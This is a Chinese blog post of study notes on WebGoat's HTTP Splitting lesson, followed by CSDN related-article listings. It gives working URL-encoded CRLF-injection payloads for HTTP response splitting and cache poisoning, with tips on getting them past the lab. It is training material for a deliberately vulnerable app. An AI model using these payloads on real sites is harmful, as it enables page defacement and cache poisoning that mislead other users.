WebGoat学习笔记(一)——HTTP Splitting

最新推荐文章于 2019-11-27 15:31:38 发布
最新推荐文章于 2019-11-27 15:31:38 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: Web渗透 文章标签: html 工具 date cache 2010 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moonhedgehog/article/details/5959767
版权

 

General——HTTP Splitting

 

 

 

 

1、HTTP Splitting

 

输入:

en%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3Atext%2Fhtml%0D%0AContent-Length%3A%2031%0D%0A%3Chtml%3E%20hacked%20successfully%3C%2Fhtml%3E


 即:

en

Content-Length: 0


HTTP/1.1 200 OK

Content-Type:text/html

Content-Length: 31

<html> hacked successfully</html>

 


 

 

2、Cache Posioning

 

输入:

en%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202011%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%3Chtml%3Ehacked%20successfully%3C%2Fhtml%3E

 

即:

en

Content-Length: 0


HTTP/1.1 200 OK

Content-Type: text/html

Last-Modified: Mon, 27 Oct 2011 14:50:18 GMT

Content-Length: 31

<html>hacked successfully</html>

 


 

 

要点:

1、%0A需要用%0D%0A(回车换行)替换,替换工具http://yehg.net/encoding/,只有在FF下所有功能才可使用,否则有功能缺失。

 

2、HTTP/1.1 200 OK之前必须有空行。(协议包格式)

 

3、一般响应头中的Expires: Thu, 01 Jan 1970 08:00:00 CST,Date: Fri, 22 Oct 2010 12:04:04 GMT,写入代码后攻击不成。

 

4、正常输入en后必须有Content-Length: 0。(标识请求结束?,冒号后必须有空格,格式要求)构造的响应中的Content-Length必须正常,不能小于包正文的长度。

 

5、html代码中的回车换行不能再用%0D%0A替换,可以用%0D。html正文代码中的内容如<,>,:等,包括空格,可以不用编码替换。

 

6、通信过程:(见图)

(1)第一次POST及响应

 

 (2)第二次GET

(3)第二次GET及响应

 

注意proxy缓存处理的问题,注意普通的第二次请求与构造的处理不同,http response splitting 效果查看辅助的工具ff Tamper Data插件。

 

参考链接:

Http代理穿透技术http://lcx.cc/?FoxNews=317.html

moonhedgehog
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoatHTTP Spliting(拆分)过程及总结分析 - 2016.01.02
baishileily的博客
01-02 1885
HTTP Spliting拆分攻击过程及原理详解
WebGoat(一)——HTTPSplittingHttp拆分攻击)
lay_loge的博客
03-18 2387
题目:This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.Enter a language for the ...
HTTP Splitting
weixin_34185364的博客
04-06 117
This one is taken from the "new" board archive. I found it amusing, never thought of this In short words: HTTP Splitting is taking advantage of the ability to input things a websites an...
WebGoat教程解析——HTTP Response Splitting
热门推荐
10-11 1万+
发现很多人在学习WebGoat上的HTTP Splitting教程之后有些疑惑,所以我也就在这里讨论一下这个问题。 HTTP Response Splitting翻译为HTTP应答拆分,是利用Web应用程序缺乏有效的输入验证,允许攻击者将CR 和LF 字符插入到应用程序响应的报头,从而将服务器的回应“拆分”成两个不同的HTTP 消息。攻击者通过发送一经过精心构造的HTTP请求,试图完全控制第
WebGoat第一关:Http SplittingCache Poison
锐之锋芒
08-28 4372
课余时间实在无聊,魔兽又不开MOP,下了个WEBSCAREB同时又下了个WEBGOAT玩,发现还不错,即算是开拓思路,同时在自己做WEB开发的时候可以少犯错误,还能学点黑客技术去黑黑别人的网站什么的。   本来不想写这篇博客的,轻易能在网上找到的东西写下来意义不大,但是闲着也是闲着,全当做个笔记一段时间之后再看或许也会别有一番风味。   WebGoat的下载安装,以及其相应工具比如WebS
Webgoat学习笔记.zip
03-12
WebGoat学习笔记WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
webgoat——Session Management Flaws会话管理缺陷
01-20
因为HTTP是没有状态的,之前认证缺陷的也会涉及到类似的知识点,由于每次请求完成后链接就会断开,当客户端再次发起请求的时候,服务端就识别不了客户端的状态,而会话管理就是解决这一问题的,其中一种会话管理是...
webgoat安装包和学习资料.zip
05-26
非常实用的网络安全学习课程,有...下载完成后在cmd中运行java -jar webgoat-container-7.1-exec.jar,默认为8080端口,若被占用可运行java -jar webgoat-container-7.1-exec.jar -httpPort 8990(随便一个空闲端口号)
WebGoat笔记
10-14
webgoat7.0的部署及题目解题教程,WebGoat里面关于会话劫持(Hijack a Session)这个课程的标准答案里面除了使用WebScarab以外还使用了其他的工具来找出合法的SessionID以完成这个课程
WebGoat学习纪要
03-19
WebGoat是一个著名的在线安全训练平台,由OWASP(开放网络应用安全项目)开发,旨在帮助网络安全专业人士和开发者学习和理解常见Web应用程序漏洞。通过一系列精心设计的练习,用户可以亲手实践,了解如何发现、利用...
WebGoat学习——HTTP 拆分技术 ( HTTP Splitting)
weixin_34032779的博客
04-10 99
  攻击者在向Web服务器正常输入的请求中加入恶意代码,受到攻击的应用不会检查CR(回车,也可表示为%0d或\r)和LF(换行,也可表示为%0a或\n)。这些字符不仅使攻击者控制应用程序打算发送的响应头和响应体,而且还使他们能够完全在其控制下创造更多的答复。HTTP拆分攻击配合缓存污染一起使用,能使效果达到最大化。缓存污染攻击的目标是使缓存污染,欺骗缓存,使其相信使用HTTP拆分劫持的页面是一...
[逐渐变黑]:HTTP Splitting attacks(分裂攻击)原理
joyareslee的专栏
03-19 2926
1.浏览器和WEB应用程序数据传输的基本知识: 所有的HTTP交易遵循相同的一般格式。每个客户端请求和服务器响应分为三个部分:请求或响应线、头部、实体。客户端启动一个交易如下:  客户端连接服务器并发送文件请求;GET /index.html?param=value HTTP/1.0    客户端发送可选头信息来通知服务器客户端的配置及他将收到的文件格式   客户端可能
owaspbwa之WebGoat
zhaji001
12-18 2826
简介  下载:https://sourceforge.net/projects/owaspbwa/files/ GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide 0x001 侦查 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5...
HTTP Response Splitting原理和解决方案
起止洺的博客
11-27 9969
描述: 造成http响应头截断漏洞的主要原因是对用户提交的非法字符没有进行严格的过滤,尤 其是CR,LF字符的输入。攻击者通过发送一经过精心构造的request,迫使服务器认为其返回的数据是两个响应,而不是常规的一个响应。当可以通过精心制作的request完全 控制第二个响应时,可以通过这样来实现攻击:发送两个请求A,B。A请求包含构造数据,该请求致使服务器返回两个响应R1,R2,其中R2是可以...
关于split测试
weixin_43217493的博客
03-15 300
import java.util.StringTokenizer; import java.util.Vector; public class SplitTest { public static String xmlDataFile=“EPK_CU_LOGM_123456.xml”; public static String emptyString = “”; public static Stri...
http response splitting attack 的基本原理
packet的专栏
06-05 5304
    translation:                      <->原理简介  http响应头截断是一种新的攻击技术,由该技术衍生了许多攻击的方法:web cache poisoning,cross user defacement,cross –site scripting等。攻击者利用它 可以获取用户的敏感信息甚至是包含用户名和密码的认证信息。在许多环境下都存在该攻击的可能,Mic
Http拆分
WannaCry_reboot
04-08 376
HTTP Spliting(拆分) HTTP Spliting攻击讲解 之所以会出现http拆分是因为客户端和服务器端每一次交互的结束标志、存在重定向和对于服务器端响应的消息在客户端是以消息队列的方式存在的。当客户端向服务器发出一个请求的时候,有时候这个请求要求服务器给我们重定向到其他的地址,这是服务器会返回给客户端一个302的重定向信息,并以Location标签给出重定向之后的访问地址,客户...
HTTP Response Splitting 攻击
cqf539的专栏
08-23 5555
翻译自https://www-304.ibm.com/support/docview.wss?uid=swg27019020#Conclusions 摘要:     国外将其归结为一种新的WEB应用漏洞攻击技术,可以构造跨站、缓存投毒和劫持敏感用户信息等。攻击是由于服务器没有
webgoat war
最新发布
11-15
WebGoat是一个用于测试Web应用程序安全性的开源平台,而WebGoat war是WebGoat的一个特定版本,它可以允许用户在本地或者服务器端进行单独的安全测试。通过使用WebGoat war,用户可以模拟实际的网络攻击和漏洞利用,以便更好地了解Web应用程序的安全性和弱点。它提供了各种实际案例,并提供了相应的解决方案和案例研究,使用户能够学习如何保护他们的Web应用程序免受各种安全威胁。 WebGoat war的使用适用于各种使用场景,从单个开发人员的本地测试到团队合作的服务器端测试。这使得用户能够根据他们的具体需要来选择最适合的测试环境,并可以随时根据需要进行调整。 总的来说,WebGoat war是一个非常有用的工具,能够帮助用户更好地了解Web应用程序的安全性,并且提供了丰富的实践案例和解决方案,可以帮助用户提高他们的网络安全意识和技能。通过使用WebGoat war,用户可以更好地保护他们的Web应用程序免受各种安全威胁,从而保护自己和他们的用户的利益。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值